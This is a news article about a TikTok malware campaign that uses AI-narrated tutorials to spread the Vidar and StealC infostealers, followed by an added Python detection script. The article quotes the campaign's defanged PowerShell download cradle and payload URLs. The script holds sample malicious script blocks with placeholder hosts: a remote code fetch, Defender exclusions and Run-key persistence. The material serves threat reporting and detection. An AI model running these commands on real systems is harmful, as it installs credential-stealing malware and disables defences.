Cybercriminals are now exploiting TikTok’s massive reach and algorithm to spread malware in a new wave of social engineering attacks.
This sophisticated campaign uses AI-generated videos to lure users into downloading information-stealing malware disguised as activation tutorials for popular software like Windows, Microsoft Office, CapCut, and Spotify. Instead of providing activation help, the videos trick viewers into installing dangerous infostealers such as Vidar and StealC.
This method marks a shift from typical malware delivery techniques, which often rely on malicious websites or phishing emails. Instead, the attack embeds its social engineering directly into TikTok video content: the instructions a victim follows are spoken and shown on screen rather than written in a link or attachment, so there is no URL or script in the lure itself for email and web security tools to scan, which makes it much harder to detect.
The campaign has gained significant traction, with one malicious video gathering close to 500,000 views, over 20,000 likes, and more than 100 comments. Researchers at Trend Micro uncovered several TikTok accounts tied to the operation, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. All of these accounts have since been taken down.
These accounts featured nearly identical faceless videos with AI-generated narration, indicating the use of an automated, scalable production method.
The technical side of the campaign is highly sophisticated. Victims are instructed to run a PowerShell command:
iex (irm hxxps://allaivo[.]me/spotify)
This command initiates a multi-step infection process. It creates hidden folders in APPDATA and LOCALAPPDATA, then adds those directories to Windows Defender’s exclusion list to avoid detection. The script proceeds to download a malicious payload from hxxps://amssh[.]co/file.exe, which contains either Vidar or StealC malware.
To ensure persistence, the malware retrieves another PowerShell script from hxxps://amssh[.]co/script[.]ps1 and adds a registry key that enables it to launch at startup.
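As an added illustration from the detection side (this is not part of the original article or of Trend Micro's research), the Python below runs a small set of rules over constructed PowerShell script-block log entries, the kind Windows records as Event ID 4104 when script block logging is enabled, that mirror the stages described above: the iex/irm download cradle, the Add-MpPreference exclusion for APPDATA and LOCALAPPDATA, the payload drop into the user profile, and the Run-key persistence. The sample entries and the .example hostnames are constructed for this example (they are not the campaign's real indicators), and the rule names, weights and verdict thresholds are my own choices rather than an established signature set.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample script-block entries (Event ID 4104 style) written for this
# example. The hostnames are placeholders, not the campaign's real domains.
SAMPLE_SCRIPT_BLOCKS = [
    # 1: the download cradle shape quoted in the article (aliases iex / irm)
    "iex (irm https://allaivo.example/spotify)",
    # 2: hidden working directory plus a Defender exclusion for it
    'New-Item -ItemType Directory -Path "$env:APPDATA\\svc" -Force | Out-Null; '
    'Add-MpPreference -ExclusionPath "$env:APPDATA\\svc","$env:LOCALAPPDATA\\svc"',
    # 3: payload drop into the profile and Run-key persistence
    'Invoke-WebRequest -Uri https://amssh.example/file.exe '
    '-OutFile "$env:LOCALAPPDATA\\svc\\file.exe"; '
    'Set-ItemProperty -Path "HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" '
    '-Name svc -Value "$env:LOCALAPPDATA\\svc\\file.exe"',
    # 4: ordinary administrative activity that must not fire
    "Get-Process | Where-Object { $_.CPU -gt 100 } | Sort-Object CPU -Descending",
]

# Rule name -> (pattern, weight). Patterns accept both the long cmdlet names and
# the short aliases, because the cradle in the article uses the aliases.
RULES: Dict[str, Tuple[re.Pattern, int]] = {
    "remote_download_cradle": (re.compile(
        r"(?:\biex\b|invoke-expression)\s*\(\s*(?:\birm\b|invoke-restmethod|\biwr\b|invoke-webrequest)"
        r"|(?:\birm\b|invoke-restmethod|\biwr\b|invoke-webrequest)[^|]*\|\s*(?:\biex\b|invoke-expression)",
        re.I), 3),
    "defender_exclusion_add": (re.compile(
        r"add-mppreference\b.*?-exclusion(?:path|process|extension)", re.I), 4),
    "executable_drop_in_user_profile": (re.compile(
        r'-outfile\s+"?\$env:(?:appdata|localappdata)\\[^"\s]*\.exe', re.I), 2),
    "run_key_persistence": (re.compile(
        r"(?:set-itemproperty|new-itemproperty|reg(?:\.exe)?\s+add)\b.*?currentversion\\run\b",
        re.I), 3),
}

# The three stages that, seen together in one session, make up the chain the
# article describes (drop is supporting evidence but not required).
CHAIN_RULES = {"remote_download_cradle", "defender_exclusion_add", "run_key_persistence"}


def classify_block(script_text: str) -> List[str]:
    """Return the names of the rules that match one script block, in RULES order."""
    return [name for name, (pattern, _) in RULES.items() if pattern.search(script_text)]


def score_block(script_text: str) -> int:
    """Sum of the weights of the rules matching one block."""
    return sum(RULES[name][1] for name in classify_block(script_text))


def assess_session(script_blocks: List[str]) -> Dict[str, object]:
    """Correlate every block logged for one PowerShell host process.

    An isolated Add-MpPreference call can be legitimate administration; the same
    call in a session that also pulled remote code or wrote a Run key is not.
    """
    hits = set()
    for block in script_blocks:
        hits.update(classify_block(block))
    if CHAIN_RULES <= hits:
        verdict = "infostealer_chain"
    elif "defender_exclusion_add" in hits and hits & (CHAIN_RULES | {"executable_drop_in_user_profile"}) - {"defender_exclusion_add"}:
        verdict = "suspicious"
    elif hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"verdict": verdict, "rules": sorted(hits), "score": sum(RULES[n][1] for n in hits)}


if __name__ == "__main__":
    for i, block in enumerate(SAMPLE_SCRIPT_BLOCKS, 1):
        print(f"block {i}: {classify_block(block)} score={score_block(block)}")
    print(assess_session(SAMPLE_SCRIPT_BLOCKS))
```

The session-level correlation is the part worth keeping: each individual rule has benign matches (administrators do add Defender exclusions and Run keys), but the combination of a remote download cradle, an exclusion added for a user-writable directory and a Run key written from the same host process is the sequence described in the article and has few legitimate explanations. Matching on 4104 script-block text also catches the obfuscated forms, because the logged block is the de-obfuscated script as PowerShell executed it.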
Vidar uses a particularly clever tactic for command-and-control communication. Rather than hard-coding its server addresses, it hides them in content hosted on legitimate platforms such as Steam profiles and Telegram channels and reads the current address from there at runtime, so the first network contact goes to a trusted domain and the operators can move the real server without rebuilding the malware, making it harder to trace and shut down.
This campaign shows how social media can be weaponized to carry out large-scale malware attacks, using popular platforms and AI to deceive users and evade traditional defenses.